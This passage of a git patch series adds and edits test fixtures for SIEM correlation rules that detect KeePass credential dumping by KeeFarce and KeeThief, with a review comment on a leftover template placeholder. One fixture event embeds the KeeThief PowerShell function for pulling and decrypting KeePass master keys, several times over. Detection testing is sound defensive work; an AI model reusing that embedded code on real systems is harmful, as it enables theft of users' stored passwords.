2\\", "object.property": "start function", "object.value": "LoadManagedProject", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-05T14:33:22.264Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\users\\public\\keefarce.exe", "subject.process.guid": "365abb72-a3a4-5cc4-0000-001084960c00", "subject.process.id": "1288", "subject.process.name": "keefarce.exe", "subject.process.path": "c:\\users\\public\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-27T18:47:00.062Z", "type": "raw", "uuid": "87e5e3bb-0cd2-4859-b54c-a79d89e3d3d3"}
+
+# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь
+expect 1 {"action": "start", "alert.context": "BootstrapDLL.dll", "alert.key": "c:\\users\\public\\keefarce.exe|c:\\program files\\keepass password safe 2\\|iewin7", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "Credentials from Password Stores: Password Managers", "correlation_name": "KeePass_CredDump", "correlation_type": "incident", "datafield6": "0x5A801260", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "KeePass_CredDump|iewin7|keefarce.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "thread", "object.process.fullpath": "c:\\program files\\keepass password safe 2\\keepass.exe", "object.process.guid": "365abb72-a201-5cc4-0000-00104f500800", "object.process.id": "2364", "object.process.name": "keepass.exe", "object.process.path": "c:\\program files\\keepass password safe 2\\", "object.property": "start function", "object.value": "LoadManagedProject", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\users\\public\\keefarce.exe", "subject.process.guid": "365abb72-a3a4-5cc4-0000-001084960c00", "subject.process.id": "1288", "subject.process.name": "keefarce.exe", "subject.process.path": "c:\\users\\public\\"}
From 19ad9a877848bd7a667124cc239fec4a854f1983 Mon Sep 17 00:00:00 2001
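Review bot: The line `+# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь` is the untouched scaffold placeholder from the test template ("your test goes here; in the expect section state how many and which correlation events you expect"), not a description of this fixture, and it was committed as-is. Replace it with a comment that says what the case covers, e.g. `# Sysmon EventID 8: KeeFarce.exe creates a remote thread in KeePass.exe (StartModule BootstrapDLL.dll, StartFunction LoadManagedProject) -> one KeePass_CredDump incident expected`. A single positive fixture also leaves the rule's negative side unpinned: a companion file with `expect 0` for a Sysmon 8 into KeePass.exe whose `StartModule`/`StartFunction` carry no injected-module indicator would show that the match depends on those fields and not on the target image alone, assuming that is how the rule is written.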
From: shadow2033 <135636880+shadow2033@users.noreply.github.com>
Date: Thu, 27 Jul 2023 14:54:54 +0300
Subject: [PATCH 08/57] =?UTF-8?q?=D1=80=D0=B0=D1=81=D1=88=D0=B8=D1=80?= =?UTF-8?q?=D0=B8=D0=BB=20=D0=BF=D0=BE=D0=BB=D1=8F=20=D0=B4=D0=B0=D0=BD?= =?UTF-8?q?=D0=BD=D1=8B=D1=85=20=D0=BA=D0=BE=D1=82=D0=BE=D1=80=D1=8B=D0=B5?= =?UTF-8?q?=20=D0=BC=D1=8B=20=D0=BE=D0=B6=D0=B8=D0=B4=D0=B0=D0=B5=D0=BC=20?= =?UTF-8?q?=D0=B4=D0=BB=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0?= =?UTF-8?q?=20(Keepass=5FKey=5FDump=5FVia=5FKeeThief).=20=D0=A3=D0=B4?= =?UTF-8?q?=D0=B0=D0=BB=D0=B8=D0=BB=20=D0=BF=D0=BE=D0=B2=D1=82=D0=BE=D1=80?= =?UTF-8?q?=D1=8F=D1=8E=D1=89=D0=B8=D0=B5=D1=81=D1=8F=20=D0=BC=D0=BE=D0=B4?= =?UTF-8?q?=D1=83=D0=BB=D1=8C=D0=BD=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82?= =?UTF-8?q?=D1=8B.?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../Keepass_Key_Dump_Via_KeeThief/tests/test_1.sc | 4 ++--
.../Keepass_Key_Dump_Via_KeeThief/tests/test_2.sc | 3 ++-
.../Keepass_Key_Dump_Via_KeeThief/tests/test_3.sc | 7 -------
.../Keepass_Key_Dump_Via_KeeThief/tests/test_4.sc | 4 ----
4 files changed, 4 insertions(+), 14 deletions(-)
delete mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Keepass_Key_Dump_Via_KeeThief/tests/test_3.sc
delete mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Keepass_Key_Dump_Via_KeeThief/tests/test_4.sc
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Keepass_Key_Dump_Via_KeeThief/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Keepass_Key_Dump_Via_KeeThief/tests/test_1.sc
index 30d446fb..59c515e8 100644
--- a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Keepass_Key_Dump_Via_KeeThief/tests/test_1.sc
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Keepass_Key_Dump_Via_KeeThief/tests/test_1.sc
@@ -1,4 +1,4 @@ {"action": "execute", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-PowerShell\",\"Guid\":\"{a0c1853b-5c40-4b15-8766-3cf1c58f985a}\"},\"EventID\":\"4104\",\"Version\":\"1\",\"Level\":\"3\",\"Task\":\"2\",\"Opcode\":\"15\",\"Keywords\":\"0x0\",\"TimeCreated\":{\"SystemTime\":\"2019-04-27T18:55:02.7106082Z\"},\"EventRecordID\":\"273644\",\"Correlation\":{\"ActivityID\":\"{83cf053f-9302-0000-d6c4-7b840293d901}\"},\"Execution\":{\"ProcessID\":\"7064\",\"ThreadID\":\"5708\"},\"Channel\":\"Microsoft-Windows-PowerShell/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"text\":\"1\",\"Name\":\"MessageNumber\"},{\"text\":\"1\",\"Name\":\"MessageTotal\"},{\"text\":\"# requires -version 2\\n\\nfunction Get-KeePassDatabaseKey {\\n<# \\n .SYNOPSIS\\n \\n Retrieves database mastey key information for unlocked KeePass database.\\n\\n Function: Get-KeePassDatabaseKey\\n Author: Lee Christensen (@tifkin_), Will Schroeder (@harmj0y)\\n License: BSD 3-Clause\\n Required Dependencies: None\\n Optional Dependencies: None\\n\\n .DESCRIPTION\\n \\n Enumerates any KeePass 2.X (.NET) processes currently open, or takes a process object on the pipeline.\\n Loades the C# KeeTheft assembly into memory and for each open KeePass process executes the GetKeePassMasterKeys()\\n method on it. GetKeePassMasterKeys() will attach to the target KeePass process using CLR MD and enumerate\\n all CLR heap objects, searching for a KeePassLib.PwDatabase object. If one is found, the path is extracted\\n from the m_strUrl field, and all referenced objects are enumerated, searching for a KeePassLib.Keys.CompositeKey.\\n If a composite master key is found, information for each key type (KcpPassword, KcpKeyFile, KcpUserAccount)\\n is extracted, including the DPAPI encrypted data blobs of key data. 
For any encrypted blobs found, shellcode\\n is injected into the KeePass process that calls MyRtlDecryptMemory() to decrypt the DPAPI memory blobs,\\n returning the plaintext/unprotected key data.\\n\\n .PARAMETER Process\\n\\n Optional KeePass process object to pass in on the pipeline.\\n\\n .EXAMPLE\\n\\n PS C:\\\\> Get-KeePassDatabaseKey -Verbose\\n VERBOSE: Examining KeePass process 4184 for master keys\\n\\n\\n Database : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\NewDatabase.kdbx\\n KeyType : KcpUserAccount\\n KeePassVersion : 2.34.0.0\\n ProcessID : 4184\\n ExecutablePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\KeePass-2.34\\\\KeePass.exe\\n EncryptedBlobAddress : 49045328\\n EncryptedBlob : {113, 148, 127, 29...}\\n EncryptedBlobLen : 64\\n PlaintextBlob : {120, 181, 162, 116...}\\n Plaintext : eLWidCSt...\\n KeyFilePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\AppData\\\\Roaming\\\\KeePass\\\\ProtectedUserKey.bin\\n\\n Database : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\NewDatabase.kdbx\\n KeyType : KcpKeyFile\\n KeePassVersion : 2.34.0.0\\n ProcessID : 4184\\n ExecutablePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\KeePass-2.34\\\\KeePass.exe\\n EncryptedBlobAddress : 49037240\\n EncryptedBlob : {137, 185, 6, 97...}\\n EncryptedBlobLen : 32\\n PlaintextBlob : {177, 5, 150, 205...}\\n Plaintext : sQWWzdcT...\\n KeyFilePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Documents\\\\s.license\\n\\n Database : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\NewDatabase.kdbx\\n KeyType : KcpPassword\\n KeePassVersion : 2.34.0.0\\n ProcessID : 4184\\n ExecutablePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\KeePass-2.34\\\\KeePass.exe\\n EncryptedBlobAddress : 48920376\\n EncryptedBlob : {228, 78, 75, 16...}\\n EncryptedBlobLen : 16\\n PlaintextBlob : {80, 97, 115, 115...}\\n Plaintext : Password123!\\n KeyFilePath :\\n\\n .EXAMPLE\\n\\n PS C:\\\\> Get-Process KeePass | 
Get-KeePassDatabaseKey -Verbose\\n VERBOSE: Examining KeePass process 4184 for master keys\\n\\n\\n Database : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\NewDatabase.kdbx\\n KeyType : KcpUserAccount\\n ....\\n# >\\n [CmdletBinding()] \\n param (\\n [Parameter(Position = 0, ValueFromPipeline = $True)]\\n [System.Diagnostics.Process[]]\\n [ValidateNotNullOrEmpty()]\\n $Process\\n )\\n \\n BEGIN {\\n if(-not $PSBoundParameters['Process']) {\\n try {\\n $Process = Get-Process KeePass -ErrorAction Stop | Where-Object {$_.FileVersion -match '^2\\\\.'}\\n }\\n catch {\\n throw 'No KeePass 2.X instances open!'\\n }\\n }\\n\\n # load file off of disk instead\\n # $Assembly = [Reflection.Assembly]::LoadFile((Get-Item -Path .\\\\ReleaseKeePass.exe).FullName)\\n\\n # the KeyTheft assembly, generated with \\\"Out-CompressedDll -FilePath .\\\\ReleaseKeePass.exe | Out-File -Encoding ASCII .\\\\compressed.ps1\\\"\\n\\n }\\n\\n PROCESS {\\n\\n ForEach($KeePassProcess in $Process) {\\n\\n if($KeePassProcess.FileVersion -match '^2\\\\.') {\\n\\n $WMIProcess = Get-WmiObject win32_process -Filter \\\"ProcessID = $($KeePassProcess.ID)\\\"\\n $ExecutablePath = $WMIProcess | Select-Object -Expand ExecutablePath\\n\\n Write-Verbose \\\"Examining KeePass process $($KeePassProcess.ID) for master keys\\\"\\n\\n $Keys = $Assembly.GetType('KeeTheft.Program').GetMethod('GetKeePassMasterKeys').Invoke($null, @([System.Diagnostics.Process]$KeePassProcess))\\n\\n if($Keys) {\\n\\n ForEach ($Key in $Keys) {\\n\\n ForEach($UserKey in $Key.UserKeys) {\\n\\n $KeyType = $UserKey.GetType().Name\\n\\n $UserKeyObject = New-Object PSObject\\n $UserKeyObject | Add-Member Noteproperty 'Database' $UserKey.databaseLocation\\n $UserKeyObject | Add-Member Noteproperty 'KeyType' $KeyType\\n $UserKeyObject | Add-Member Noteproperty 'KeePassVersion' $KeePassProcess.FileVersion\\n $UserKeyObject | Add-Member Noteproperty 'ProcessID' $KeePassProcess.ID\\n $UserKeyObject | Add-Member Noteproperty 
'ExecutablePath' $ExecutablePath\\n $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobAddress' $UserKey.encryptedBlobAddress\\n $UserKeyObject | Add-Member Noteproperty 'EncryptedBlob' $UserKey.encryptedBlob\\n $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobLen' $UserKey.encryptedBlobLen\\n $UserKeyObject | Add-Member Noteproperty 'PlaintextBlob' $UserKey.plaintextBlob\\n\\n if($KeyType -eq 'KcpPassword') {\\n $Plaintext = [System.Text.Encoding]::UTF8.GetString($UserKey.plaintextBlob)\\n }\\n else {\\n $Plaintext = [Convert]::ToBase64String($UserKey.plaintextBlob)\\n }\\n\\n $UserKeyObject | Add-Member Noteproperty 'Plaintext' $Plaintext\\n\\n if($KeyType -eq 'KcpUserAccount') {\\n try {\\n $WMIProcess = Get-WmiObject win32_process -Filter \\\"ProcessID = $($KeePassProcess.ID)\\\"\\n $UserName = $WMIProcess.GetOwner().User\\n\\n $ProtectedUserKeyPath = Resolve-Path -Path \\\"$($Env:WinDir | Split-Path -Qualifier)\\\\Users\\\\*$UserName*\\\\AppData\\\\Roaming\\\\KeePass\\\\ProtectedUserKey.bin\\\" -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path\\n\\n $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $ProtectedUserKeyPath\\n\\n }\\n catch {\\n Write-Warning \\\"Error enumerating the owner of $($KeePassProcess.ID) : $_\\\"\\n }\\n }\\n else {\\n $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $UserKey.keyFilePath\\n }\\n\\n $UserKeyObject.PSObject.TypeNames.Insert(0, 'KeePass.Keys')\\n $UserKeyObject\\n }\\n }\\n }\\n else {\\n Write-Verbose \\\"No keys found for $($KeePassProcess.ID)\\\"\\n }\\n }\\n else {\\n Write-Warning \\\"Only KeePass 2.X is supported at this time.\\\"\\n }\\n }\\n }\\n}\\n\",\"Name\":\"ScriptBlockText\"},{\"text\":\"d4643a9b-6f64-4fbc-95e8-c2524689590f\",\"Name\":\"ScriptBlockId\"},{\"text\":\"C:\\\\Users\\\\Administrator\\\\Downloads\\\\KeeThief_test\\\\KeeThief-master\\\\KeeTheft\\\\KeeTheft\\\\KeeThief.ps1\",\"Name\":\"Path\"}]}}}", "category.generic": "Command", "category.high": "System 
Management", "category.low": "Manipulation", "event_src.category": "Operating system", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-PowerShell/Operational", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Common_PowerShell_4104_Command_executed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4104", "normalized": true, "numfield1": 1, "numfield2": 1, "object": "command", "object.account.id": "S-1-5-18", "object.fullpath": "C:\\Users\\Administrator\\Downloads\\KeeThief_test\\KeeThief-master\\KeeTheft\\KeeTheft\\KeeThief.ps1", "object.id": "d4643a9b-6f64-4fbc-95e8-c2524689590f", "object.name": "KeeThief.ps1", "object.path": "C:\\Users\\Administrator\\Downloads\\KeeThief_test\\KeeThief-master\\KeeTheft\\KeeTheft\\", "object.process.cmdline": "# requires -version 2function Get-KeePassDatabaseKey {<# .SYNOPSIS Retrieves database mastey key information for unlocked KeePass database. Function: Get-KeePassDatabaseKey Author: Lee Christensen (@tifkin_), Will Schroeder (@harmj0y) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION Enumerates any KeePass 2.X (.NET) processes currently open, or takes a process object on the pipeline. Loades the C# KeeTheft assembly into memory and for each open KeePass process executes the GetKeePassMasterKeys() method on it. GetKeePassMasterKeys() will attach to the target KeePass process using CLR MD and enumerate all CLR heap objects, searching for a KeePassLib.PwDatabase object. If one is found, the path is extracted from the m_strUrl field, and all referenced objects are enumerated, searching for a KeePassLib.Keys.CompositeKey. 
If a composite master key is found, information for each key type (KcpPassword, KcpKeyFile, KcpUserAccount) is extracted, including the DPAPI encrypted data blobs of key data. For any encrypted blobs found, shellcode is injected into the KeePass process that calls MyRtlDecryptMemory() to decrypt the DPAPI memory blobs, returning the plaintext/unprotected key data. .PARAMETER Process Optional KeePass process object to pass in on the pipeline. .EXAMPLE PS C:\\> Get-KeePassDatabaseKey -Verbose VERBOSE: Examining KeePass process 4184 for master keys Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpUserAccount KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 49045328 EncryptedBlob : {113, 148, 127, 29...} EncryptedBlobLen : 64 PlaintextBlob : {120, 181, 162, 116...} Plaintext : eLWidCSt... KeyFilePath : C:\\Users\\harmj0y.TESTLAB\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpKeyFile KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 49037240 EncryptedBlob : {137, 185, 6, 97...} EncryptedBlobLen : 32 PlaintextBlob : {177, 5, 150, 205...} Plaintext : sQWWzdcT... KeyFilePath : C:\\Users\\harmj0y.TESTLAB\\Documents\\s.license Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpPassword KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 48920376 EncryptedBlob : {228, 78, 75, 16...} EncryptedBlobLen : 16 PlaintextBlob : {80, 97, 115, 115...} Plaintext : Password123! 
KeyFilePath : .EXAMPLE PS C:\\> Get-Process KeePass | Get-KeePassDatabaseKey -Verbose VERBOSE: Examining KeePass process 4184 for master keys Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpUserAccount ....# > [CmdletBinding()] param ( [Parameter(Position = 0, ValueFromPipeline = $True)] [System.Diagnostics.Process[]] [ValidateNotNullOrEmpty()] $Process ) BEGIN { if(-not $PSBoundParameters['Process']) { try { $Process = Get-Process KeePass -ErrorAction Stop | Where-Object {$_.FileVersion -match '^2\\.'} } catch { throw 'No KeePass 2.X instances open!' } } # load file off of disk instead # $Assembly = [Reflection.Assembly]::LoadFile((Get-Item -Path .\\ReleaseKeePass.exe).FullName) # the KeyTheft assembly, generated with \"Out-CompressedDll -FilePath .\\ReleaseKeePass.exe | Out-File -Encoding ASCII .\\compressed.ps1\" } PROCESS { ForEach($KeePassProcess in $Process) { if($KeePassProcess.FileVersion -match '^2\\.') { $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\" $ExecutablePath = $WMIProcess | Select-Object -Expand ExecutablePath Write-Verbose \"Examining KeePass process $($KeePassProcess.ID) for master keys\" $Keys = $Assembly.GetType('KeeTheft.Program').GetMethod('GetKeePassMasterKeys').Invoke($null, @([System.Diagnostics.Process]$KeePassProcess)) if($Keys) { ForEach ($Key in $Keys) { ForEach($UserKey in $Key.UserKeys) { $KeyType = $UserKey.GetType().Name $UserKeyObject = New-Object PSObject $UserKeyObject | Add-Member Noteproperty 'Database' $UserKey.databaseLocation $UserKeyObject | Add-Member Noteproperty 'KeyType' $KeyType $UserKeyObject | Add-Member Noteproperty 'KeePassVersion' $KeePassProcess.FileVersion $UserKeyObject | Add-Member Noteproperty 'ProcessID' $KeePassProcess.ID $UserKeyObject | Add-Member Noteproperty 'ExecutablePath' $ExecutablePath $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobAddress' $UserKey.encryptedBlobAddress $UserKeyObject | Add-Member Noteproperty 
'EncryptedBlob' $UserKey.encryptedBlob $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobLen' $UserKey.encryptedBlobLen $UserKeyObject | Add-Member Noteproperty 'PlaintextBlob' $UserKey.plaintextBlob if($KeyType -eq 'KcpPassword') { $Plaintext = [System.Text.Encoding]::UTF8.GetString($UserKey.plaintextBlob) } else { $Plaintext = [Convert]::ToBase64String($UserKey.plaintextBlob) } $UserKeyObject | Add-Member Noteproperty 'Plaintext' $Plaintext if($KeyType -eq 'KcpUserAccount') { try { $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\" $UserName = $WMIProcess.GetOwner().User $ProtectedUserKeyPath = Resolve-Path -Path \"$($Env:WinDir | Split-Path -Qualifier)\\Users\\*$UserName*\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin\" -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $ProtectedUserKeyPath } catch { Write-Warning \"Error enumerating the owner of $($KeePassProcess.ID) : $_\" } } else { $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $UserKey.keyFilePath } $UserKeyObject.PSObject.TypeNames.Insert(0, 'KeePass.Keys') $UserKeyObject } } } else { Write-Verbose \"No keys found for $($KeePassProcess.ID)\" } } else { Write-Warning \"Only KeePass 2.X is supported at this time.\" } } }}", "object.process.id": "7064", "object.value": "# requires -version 2function Get-KeePassDatabaseKey {<# .SYNOPSIS Retrieves database mastey key information for unlocked KeePass database. Function: Get-KeePassDatabaseKey Author: Lee Christensen (@tifkin_), Will Schroeder (@harmj0y) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION Enumerates any KeePass 2.X (.NET) processes currently open, or takes a process object on the pipeline. Loades the C# KeeTheft assembly into memory and for each open KeePass process executes the GetKeePassMasterKeys() method on it. 
GetKeePassMasterKeys() will attach to the target KeePass process using CLR MD and enumerate all CLR heap objects, searching for a KeePassLib.PwDatabase object. If one is found, the path is extracted from the m_strUrl field, and all referenced objects are enumerated, searching for a KeePassLib.Keys.CompositeKey. If a composite master key is found, information for each key type (KcpPassword, KcpKeyFile, KcpUserAccount) is extracted, including the DPAPI encrypted data blobs of key data. For any encrypted blobs found, shellcode is injected into the KeePass process that calls MyRtlDecryptMemory() to decrypt the DPAPI memory blobs, returning the plaintext/unprotected key data. .PARAMETER Process Optional KeePass process object to pass in on the pipeline. .EXAMPLE PS C:\\> Get-KeePassDatabaseKey -Verbose VERBOSE: Examining KeePass process 4184 for master keys Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpUserAccount KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 49045328 EncryptedBlob : {113, 148, 127, 29...} EncryptedBlobLen : 64 PlaintextBlob : {120, 181, 162, 116...} Plaintext : eLWidCSt... KeyFilePath : C:\\Users\\harmj0y.TESTLAB\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpKeyFile KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 49037240 EncryptedBlob : {137, 185, 6, 97...} EncryptedBlobLen : 32 PlaintextBlob : {177, 5, 150, 205...} Plaintext : sQWWzdcT... 
KeyFilePath : C:\\Users\\harmj0y.TESTLAB\\Documents\\s.license Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpPassword KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 48920376 EncryptedBlob : {228, 78, 75, 16...} EncryptedBlobLen : 16 PlaintextBlob : {80, 97, 115, 115...} Plaintext : Password123! KeyFilePath : .EXAMPLE PS C:\\> Get-Process KeePass | Get-KeePassDatabaseKey -Verbose VERBOSE: Examining KeePass process 4184 for master keys Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpUserAccount ....# > [CmdletBinding()] param ( [Parameter(Position = 0, ValueFromPipeline = $True)] [System.Diagnostics.Process[]] [ValidateNotNullOrEmpty()] $Process ) BEGIN { if(-not $PSBoundParameters['Process']) { try { $Process = Get-Process KeePass -ErrorAction Stop | Where-Object {$_.FileVersion -match '^2\\.'} } catch { throw 'No KeePass 2.X instances open!' 
} } # load file off of disk instead # $Assembly = [Reflection.Assembly]::LoadFile((Get-Item -Path .\\ReleaseKeePass.exe).FullName) # the KeyTheft assembly, generated with \"Out-CompressedDll -FilePath .\\ReleaseKeePass.exe | Out-File -Encoding ASCII .\\compressed.ps1\" } PROCESS { ForEach($KeePassProcess in $Process) { if($KeePassProcess.FileVersion -match '^2\\.') { $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\" $ExecutablePath = $WMIProcess | Select-Object -Expand ExecutablePath Write-Verbose \"Examining KeePass process $($KeePassProcess.ID) for master keys\" $Keys = $Assembly.GetType('KeeTheft.Program').GetMethod('GetKeePassMasterKeys').Invoke($null, @([System.Diagnostics.Process]$KeePassProcess)) if($Keys) { ForEach ($Key in $Keys) { ForEach($UserKey in $Key.UserKeys) { $KeyType = $UserKey.GetType().Name $UserKeyObject = New-Object PSObject $UserKeyObject | Add-Member Noteproperty 'Database' $UserKey.databaseLocation $UserKeyObject | Add-Member Noteproperty 'KeyType' $KeyType $UserKeyObject | Add-Member Noteproperty 'KeePassVersion' $KeePassProcess.FileVersion $UserKeyObject | Add-Member Noteproperty 'ProcessID' $KeePassProcess.ID $UserKeyObject | Add-Member Noteproperty 'ExecutablePath' $ExecutablePath $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobAddress' $UserKey.encryptedBlobAddress $UserKeyObject | Add-Member Noteproperty 'EncryptedBlob' $UserKey.encryptedBlob $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobLen' $UserKey.encryptedBlobLen $UserKeyObject | Add-Member Noteproperty 'PlaintextBlob' $UserKey.plaintextBlob if($KeyType -eq 'KcpPassword') { $Plaintext = [System.Text.Encoding]::UTF8.GetString($UserKey.plaintextBlob) } else { $Plaintext = [Convert]::ToBase64String($UserKey.plaintextBlob) } $UserKeyObject | Add-Member Noteproperty 'Plaintext' $Plaintext if($KeyType -eq 'KcpUserAccount') { try { $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\" $UserName = 
$WMIProcess.GetOwner().User $ProtectedUserKeyPath = Resolve-Path -Path \"$($Env:WinDir | Split-Path -Qualifier)\\Users\\*$UserName*\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin\" -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $ProtectedUserKeyPath } catch { Write-Warning \"Error enumerating the owner of $($KeePassProcess.ID) : $_\" } } else { $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $UserKey.keyFilePath } $UserKeyObject.PSObject.TypeNames.Insert(0, 'KeePass.Keys') $UserKeyObject } } } else { Write-Verbose \"No keys found for $($KeePassProcess.ID)\" } } else { Write-Warning \"Only KeePass 2.X is supported at this time.\" } } }}", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-06T11:33:47.757Z", "status": "success", "subject": "account", "subject.account.id": "S-1-5-18", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-27T18:55:02.710Z", "type": "raw", "uuid": "3e774e05-1f1a-4b58-812a-3127158afc3a"}
-{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"8\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"8\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-27T18:55:04.9801378Z\"},\"EventRecordID\":\"7071\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"1816\",\"ThreadID\":\"1228\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-04-27 
